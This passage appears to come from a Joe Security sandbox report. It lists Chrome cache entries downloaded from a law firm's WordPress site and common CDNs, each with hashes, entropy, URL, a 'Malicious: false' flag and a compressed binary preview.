..r0.<d%.^ m..f..:... T..\3.F.5. ..q.~Q-... ......[..G ......om.. ._....[.df ...|H..#4p w.T.0..e'. ..y....B] Process: C:\Program Files\Google\Chrome\Application\chrome.exe File Type: gzip compr essed data , from Uni x, origina l size mod ulo 2^32 7 2184 Category: downloaded Size (bytes): 13029 Entropy (8bit): 7.964005914757563 Encrypted: false SSDEEP: MD5: 22A681F864D256185A8AE3B26FE324D8 SHA1: 9DBA20252F05C22B2F6229412669A25FFF9A607A SHA-256: D0F65C0B0B4A2F1781D3AA2617CB292C549196C8C0C22ED99729FF615500BF99 SHA-512: 5CBC8BC9117B30DFFDE0A902A7927B16B599F84D796418EC3A58C312929572A85CF70AC8BE1BF34813C35A8F6CC2DA5D6F623BB4BFCACB6A87773F4F4D6A27 7C Malicious: false Chrome Cac he Entry: 233 Chrome Cac he Entry: 235 Chrome Cac he Entry: 236 Copyright Joe Security LLC 2026 Page 10 of 30 Reputation: unknown URL: https://www.fitlawyers.com.au/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.css?ver=5.15.3 Preview: .......... ._..H...." v.A..j.'=. ..h...0..H .h..\.].Vn .1....w.#2 .......FWV ..w..{.... ...x.....K x...{;..?9 .....|../. q.?.o.e.a. _....._... .........; .....?.... .......... ...../.... ........U. ..?....9.O .[........ ...}.i>.T. ../...^^.l .......gk. .......%.. .;u.....DK .d4yV..~5t .......... .....nt.n& ..__..}L.{ . ./...W.` ....9..... .....0..&. ....'._... ....~m..?. ..z.O..... .5k.v..s.? .......... ...|E_...E ..|.ZF_... U..~...j.. 6....k.I.. .^..^.4..8 ...p...q.. '......U.. .Z.l.Cb..Q ....G..... F....~.... ._I..V?~.. ........>f ..:h..pl(. W..p...D.c ._y.5[.|.N .z......[. .}...?.... .....;.... ....^.<Yv. a...#..[.. ......K... ...{..#.?. d.A......r .?...GS?.. '.k....... ..sO~3O~.. .(~[.U/... q.....=... ..\....^t. .;......o. Dw...y...W ...O.<.T.. ........K. v..?.....h .u....(..3 .c......._ ^..o.Z6... ........;. ....q..a.b .&....w... V_.....3.. .....?k.C. .?......?. .5.?.?.._. pf....2..y .o.......6 .B..E.o... ....>.B?}. F.b.N..K . oe6..e..Yw R./...E..K .L'Hb..].. ..p.7...O. .@....//O" ...J.o.IDK }q.... Process: C:\Program Files\Google\Chrome\Application\chrome.exe File Type: Zstandard compressed data (v0. 8+), Dicti onary ID: None Category: downloaded Size (bytes): 7794 Entropy (8bit): 7.969709975515874 Encrypted: false SSDEEP: MD5: 6626FEEB9B94FA3FDB41AE5C89FA6FD5 SHA1: 02C7919DDA2285AD4F7A1B5D15564CC8D8AC459A SHA-256: 51993A50DB06D88422573E8D88B2D74AE16604CCE90FDD4FCE0E08E0099BBC78 SHA-512: 7519EED1CF1E848AC760EEE7C92C4616826C2946FC50E728BA955E9A3E7D3D40C0C0AB1797FF268CAB7F44402C398D21580B44EDDBD2680B1647AFFE5603BC 1E Malicious: false Reputation: unknown URL: https://use.fontawesome.com/releases/v5.0.0/css/all.css Preview: (./..X<C.: jt.(.P.... X.|...|EM ..-.b.B... ..I.P.g.7. .,.!...ME| ../...V.n. ..`N...#K. ...=W.T... .%.U.gdNMa O.F.`|_.0. .b...4.B. 0..\k..9.. .Q7..R.C!. .&C...F.L. D.sNaOo..4 .K%.=..y7. .N.@.#.W.. .....W..\. ...TS....O .zd...R..x ...=.Z.?.@ .....K.T.. ..5R..RI<K %1Y*..RI.T ..0..(P... ..X.$...$. .I.....&.. $..$..$... Bp..,m.... ...B...G.. .(..J...%K Y..t....j. aAri}..H.. 0p />....> em...+.... .......... .I...K...# .U.{ ...). ..0...A=.. ....h*..T. .=.8 _.Drk .'..S.-q.. S....{.$.. K....P.O.4 .4.5.-..`. hu...(WV[. ...BC.A... ....<.w.T6 R..P... ". .tY....P.. .o.'.*-..V .......CA. +.8X..em.. M}&}.....0 GN9B]...T. ..yeO.JD.. =..u....$. .).S.;y.W. ...D..&Q;K y".......} .Y.cF..... ...q[..... .1....zi.. /....1.{`m ....4.)... ..e.To/... mGU=N.q... ....".U,.. .6nQ_....N .Z...~.[.< \C..&+.P.. b1.Z....y- x9....8f.q ...;Tw.z.. ........z. .6%.5N.lu% ...J.V[xN. u....fi.4. ..bn..7.zB t.....m..4 :V..Fw. ._ ...UC<A... .[E..w...R ........". .)C..C.Y.. ...n...... ..W...!... ..E2....I. =.AA.${Th. .......... Y..6.:.]'. ..0.`.a... ...3..Y... r.;r..eS.. 5 Process: C:\Program Files\Google\Chrome\Application\chrome.exe File Type: gzip compr essed data , from Uni x, origina l size mod ulo 2^32 5 697 Category: downloaded Size (bytes): 2543 Entropy (8bit): 7.919136665698786 Encrypted: false SSDEEP: MD5: 5B5FBC7CBC6D99B496509321EFCA6A34 SHA1: 79F93ECCD4CE5C7178670C995C43DF7108911674 SHA-256: 547AEE33116D76B2CBEE581FD77D7072F6F62199A26B3C1F16C1F7DFD22B5805 SHA-512: 59F9237EB97A320AE936CC153EAF317E1508D7191F73B1FAB007C080A7CD7184BCF3C5040AFCCBB738803E0D98DFCC92FD8E4CE42C9AE7B207996378EFB1B9 6A Malicious: false Reputation: unknown URL: https://www.fitlawyers.com.au/wp-includes/js/dist/i18n.min.js?ver=781d11515ad3d91786ec Preview: .......... .Rkw.6.... .WH.D..... n[.NZ.mZ'N ..)syh.... ....U..}.. CR.e.....} ..u...J..X ;.*R...'.E ].MC...s.. ..lcbB...7 <.n.x..-.. }.O3._*Yp. .6....\_.> x..Xe...e. .^Dw....n. ...._..... ....ib.S.. ...e..kM.b ..PH.Ko... i.z...J7.T .t.L...D?. ."....Eu.U t.so<kh.W. .s...R.&.. P.#.#-p..l }i%b.I.P3, .zT.0.i.(. ..|.....I5 f.O&.F..0. E.....a9.. ..6.P_q])1 .e...`..gz .D..s.I... .i.+C.X..7 .y.\&U.... ...\;.j.+. .w).8`.(4. ..\.l.l... &.3-.G,.[= .....?...D "....]J..l ..F..R...M .ZF~.P..7. x../!l..@+ .g.t.x.... .[@j/%...# .Y..@..V.( ...:...|.. .......~.. }.BY.L..Z/ ..n.Xe7..v {..?&.\'Sz .....0:... .....}.<.. ..b4...(xr .<!.)..... .y...\..^. I..+Oo..q@ .o.^.....u ..X.Y...JE k7+./Q.Y.R $...hW.".b Nb.}3.6.(. .$.}+...E. .].>...1?. .1?.@._.. 1.3.....x. ..q...tJ. .c+.%....I ....5I.b.8 :..g.O&z]p ....-....k .kl.O~u/^* Yp..2{.v.E ..[D.3OY.. ._.2.$.u=. l(ql..>.]. B>.A..Z^d. <!9m..>u.B ."3.....C. ...{9...y. ec.p..`./. s.q..}.... >......c.} l.S..'8G.{ .x........ ...6i.&... ...v.....; ...?...-p. q....S.3.. ........;> e.......L. k....^}M.1 .>....... Process: C:\Program Files\Google\Chrome\Application\chrome.exe File Type: gzip compr essed data , max comp ression, o riginal si ze modulo 2^32 52310 Category: downloaded Size (bytes): 20802 Entropy (8bit): 7.988304321456747 Encrypted: false SSDEEP: MD5: 8BD8220CA4C1C9BF2756086B9CDD2737 SHA1: C4B09065BDB49F26CB911E6C724D49CDAA771B6D Chrome Cac he Entry: 237 Chrome Cac he Entry: 239 Chrome Cac he Entry: 242 Copyright Joe Security LLC 2026 Page 11 of 30 SHA-256: 57E12433622A0F043D950BC766A5BC423008D0468CAB6497F3EAD4E55DF7C1C7 SHA-512: 16C22BB9F89D11DF3DB453AB71365FD27DE31FFE97B1159B5BA940932773B0C4FD02903D9ED55CB1F05EB88EDE1B3561EE555E90A0A592ABDA4F826EBE5EB 691 Malicious: false Reputation: unknown URL: https://www.google-analytics.com/analytics.js Preview: .......... .}iW.K..w~ .....6M.EM l...'@.G.z J.d.."B.o. ....:..s.k ).k...5F.d ..u=..g... 0O.TR..... p...;.uJ.$ ...nsx^.I{ .......... .....W..qp 9....e.k.. ^w.^{!,..i .hu......+ .a.....bt< .tZk5..7.. $Q......6. ..Rw..~I.. .f...(B.qm x..]...... w8.M$.K..| .7........ ...[.~t..u .....|.nn~ .wy.o5..G. ..v.7..... ......F..^ .P..?|.... .V.u...4.. [.V..o]F.y ..VY...<'s .......v.. ...g....2. l..^..n4.q VJ.8...... .y.1.|.... 8...V:.RO. .8=]\..0<. .g.r...{.E ..U..f.~.q ..h...az.^ .1J..6N..Z ....qt.... ..Q.8ocd.` X.z..|.... W....?x... ...O..|.V. Ee.g.{.... . .L+.k... 6.>z.tV2MG eL.-....\. ..+~...^G. ........<. o...\..... -;.b!..m.. .......... W.rz..re.. .^...U.... ..Qt|sc>.& ..{m>...C. .R..-..... ...S...no1 ..:.JA...} ...[Z...~W ......?8W. ..N@...... .%.7.ZR... 4...6...K3 /{.d...)*7 .TM..'O6.. 6Vn.O....S .........s .......... n.k....... ..0...=>.. o..i..b... :..l..(... ../......e ..e.l...X~ }3;|.;..j> og......y4 8......... K|..5.mM.. .^..8..... ..[..I.P9. .qm..T..5. .4.V..nv5. ..7.V.v... ($.....?.5 .......p.. ..}...=... .~.rX.. Process: C:\Program Files\Google\Chrome\Application\chrome.exe File Type: gzip compr essed data , from Uni x, origina l size mod ulo 2^32 7 76 Category: downloaded Size (bytes): 323 Entropy (8bit): 7.328465538809458 Encrypted: false SSDEEP: MD5: B24C24B7DA3FFEED6AE8ADE102A4D317 SHA1: C4445B3977CE704B927508108E100213EEA67A3C SHA-256: 5421AD49B70F379553EACEEC744D753E74D4B065966C08AA7C7DD949553CA9A8 SHA-512: 497071EC334AB16DBDD615D623676BD707F02DAF41AC2FB2C835B040CEB90C38CE46C0C283F606AAA04B9FBE476175B9643222A689417ADC5C90D0EDBE0BC5 6C Malicious: false Reputation: unknown URL: https://www.fitlawyers.com.au/wp-content/plugins/header-footer-elementor/assets/css/header-footer-elementor.css?ver=2.8.8 Preview: .......... ...N.0.... S.!n&..u.. ...-nk.:.. ......~... ].../y.}D1 =.X...(... S..b...l>. ..h.uD.... .2...kl1.l .e9...v..h ...Y.u.... ....=]Y..M K......W.G ...3QS.... W.,....g.' .#..PnZ... ....J..U.w ...7^..b9t V.#.S.y... .4.......a iwM..VS0.. `...B..... C..;...... ...:..:.M. .l|..j.*.s L.T.'....* ~.a....r9. ..<. .`i.. 9......... Process: C:\Program Files\Google\Chrome\Application\chrome.exe File Type: gzip compr essed data , from Uni x, origina l size mod ulo 2^32 8 850 Category: downloaded Size (bytes): 1774 Entropy (8bit): 7.8802419337067136 Encrypted: false SSDEEP: MD5: 4B156309C6E801B5A65BFD514961869B SHA1: 655F46397296568B709EB91584C76AD034388C41 SHA-256: 5C89B140D6381892C3824876391324E42AA8A4CBA43C54C6E50D1405BA9993E4 SHA-512: E1DCBFC3A6C85AF47D367452098259742FE900DF175C66BABA0F521D695DC4E5324B0BC970D33FF8FFF00A7353B3AD7FEE7395CC8F6E9F6879EB2BF505A8078 E Malicious: false Reputation: unknown URL: https://www.fitlawyers.com.au/wp-content/uploads/astra-addon/astra-addon-6578dbb2b85f88-20272772.css?ver=3.9.2 Preview: .......... ..N.8..o%+ ....../[.. ...p.I3..l ..".}..BR. o.*...{..s NX..,.!..D ..6..Ba.. L...6a_O.. L..PK...X. ....Go.7." ...\..B..d ...G...,.. ...l;.*).Z >o[..f.R.. @?.D$.J.qM .b*E..G.3B [tH../.pn. 5J..Y...9. 2w..C..(.j ...t.4Ti. ..2.....". o2.<....\H Zw+8.8&..5 W....R.^.. $....T.N.. .........J ...@X`..*. P.....8L.. 7)PJ..7..4 .`....B].V bbIU...78. .....7+ed. .~S....... \._...gK.. ....../.:. .&Ud....L= ....C.Y?.. 3.....C... ..BI...... .......... ..AI...d.. *+.J%R.I.. ..e....XA. ..{...T... V....lpD.] ].E...H,.. A..t.4Ti.. 2.w.../\<. .J.}.t.=.. ....+..... .x..._t{.c SL}#....P. .+...*.p.` [%....:.8. 6..%Z...G. .(JW.1...H .J.. ....3 ...?..gB.R ...T.6.m3. `..x..a... .\..p..._= )#fkHV.X.. .g.......7 ..#....os. J)fS...L.p ..*.. .... .`Xk,(.r.. 6p.n-.NA;0 qJ....y..C .......S.. ....$4)y.. ;x.RA.h... .tF.;[w... .W'd.u.B). D..m..(.yi ].7t..>/7. %.2.Y@.O.. .N..l....z ....1*7.B. ,...(.]... m...+..E.m ....}<..o. \..LQw._.. .....@T... k..@7d...f 7."._..... r.M[&.'6.< .w.3N+c... ......._|. .HQ..c..$+ t,..*.).W. ..B..sO.t. .tp3..Q..c ..=rR>.5." m.D Process: C:\Program Files\Google\Chrome\Application\chrome.exe File Type: gzip compr essed data , from Uni x, origina l size mod ulo 2^32 5 236 Category: downloaded Size (bytes): 1265 Entropy (8bit): 7.835263889969919 Encrypted: false SSDEEP: Chrome Cac he Entry: 243 Chrome Cac he Entry: 244 Chrome Cac he Entry: 245 Copyright Joe Security LLC 2026 Page 12 of 30 MD5: EE2E0C9A140B20A7A1229DC228CCB296 SHA1: F00FAC7F90DC4C4BB2336957CB2BB14BC37B9FE1 SHA-256: 92B92962EF38311093079A9CAF8D1C825C80DC6D41A3C20916E835AE2E082B5B SHA-512: F1DBE3ECCCABD11AA1DF3EEA5018698E6EDA3898F44D0606A7CEA3EAA5C0165FF5B6405913B95133682EEAE3C4FCC215B985C50C5525CDBCC55F173A995F0 6EF Malicious: false Reputation: unknown URL: https://www.fitlawyers.com.au/wp-content/plugins/elementor-pro/assets/css/widget-blockquote.min.css?ver=3.25.0 Preview: .......... .RMs.6...W ..d&N...m9 ./=..C'=.. ....5.0... s2..._._R. ...,Yq.... v....{.s.. jPN.....h~ ..q...{.L. $.L...~... ...??.F.e. o2+Rh..).. .>..A....% U....R.,+w .q!A....u. ...^.JT..I 6..h.|.hY /.mtn w9+. J. [.3L.... .p0...R... R\]]..R..{ .i.....J.. L.......IT .O...U.Oa. ....9....$ .9.....;.. |$B...L... ).9.m..... ..7-.<o..& .........F .Z.......X .*.5~.u... [=.s..N.c. ...!.7...] u.m#...... .:.+.V.s[. ..-.....M' .r.....z.. 9$>."L .xV h..}.r..I. E..+...i.. .W..9.C..u .7.*Jj}Oj. \...7n..J+ =.~....... .f_.MR[.O. .......1.g .`..?i...= y|8...I.2. w.Q.uX...5 ...1/;.R.. ..:.....B. ,..-*t~z.A .. ...}d.M ...y...... m.B2k.8... YqW..*N.3. k....8...I ..+..Y...{ ..u....9.. .7PGi<.g.. ......t... ..%.r..... .......... J......... ...V.Cv... BW........ .........# ,..~....!. ..v.....0. Q.4.... '" .1^D.I..^' ..F[t..e.. u.9..g..B. ...d....p. ..7..F4.?. .\.....PG. ..(.n..... JPIT@@qRh. .}.r..I..; _G..2T.... ......c.pM ..}"...X._ A.yd.&.O<. >.....~u.. .R.~9.w-.. ..p.`Y.... ....g.Z... .J....l.Mn .7,y!Z.... ]......... ....wW...M -O.;..K.u9 +.J.[...V0 Process: C:\Program Files\Google\Chrome\Application\chrome.exe File Type: gzip compr essed data , from Uni x, origina l size mod ulo 2^32 7 32 Category: downloaded Size (bytes): 322 Entropy (8bit): 7.331764888902322 Encrypted: false SSDEEP: MD5: E13CD73D05E2C5889FC556FFE25466DD SHA1: A180B6732D85A151B0AF1620FD881B3E78099C58 SHA-256: E2E6D7C7051A7DF6602E234D35D0D8DAD5FBC691EAEF6511087D10160FFF3950 SHA-512: 04AE3E10CFFAF32F28B4D29AC25B54B498D0970280C251B134711CC054DFF44156A027B67B790FB21AC97BDA772C18C8A7659008189408DD445B54F6CCEC6AA C Malicious: false Reputation: unknown URL: https://www.fitlawyers.com.au/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.css?ver=5.15.3 Preview: .......... .R.O.0...W <.a..v.v.. :..%..z.X. u#.Jh'...n alA......W .JgW.. ... ...,....V. _..HZ..f.. .;.+.P:BI* ..%.S,..$* ....g..R.. ..~.%Y.... y......... ..0......5 Y..ky..... .p*r..0.q. ..kVfjz{.) ...Y.`.6.o w:..bq.\U. ..D....U.. ...c.B.L:. ..yI...5A. m....$G... .5..cc.`.a ...K.Vh... ......c8.. .%;C..X..= .YS.o'..12 1..l.eY... ..h\..Q... .... Process: C:\Program Files\Google\Chrome\Application\chrome.exe File Type: gzip compr essed data , from Uni x, origina l size mod ulo 2^32 2 7363 Category: downloaded Size (bytes): 4452 Entropy (8bit): 7.939311627642963 Encrypted: false SSDEEP: MD5: 5595E7AE2035903850153E16AB4B3052 SHA1: C2825413A355EB5C352B841D4C2EDB4DA8BD9768 SHA-256: C58256032E750D4734EED050BDAD86222E1CEA1C49DAAEC6AF65482EBC37EC3A SHA-512: 1855278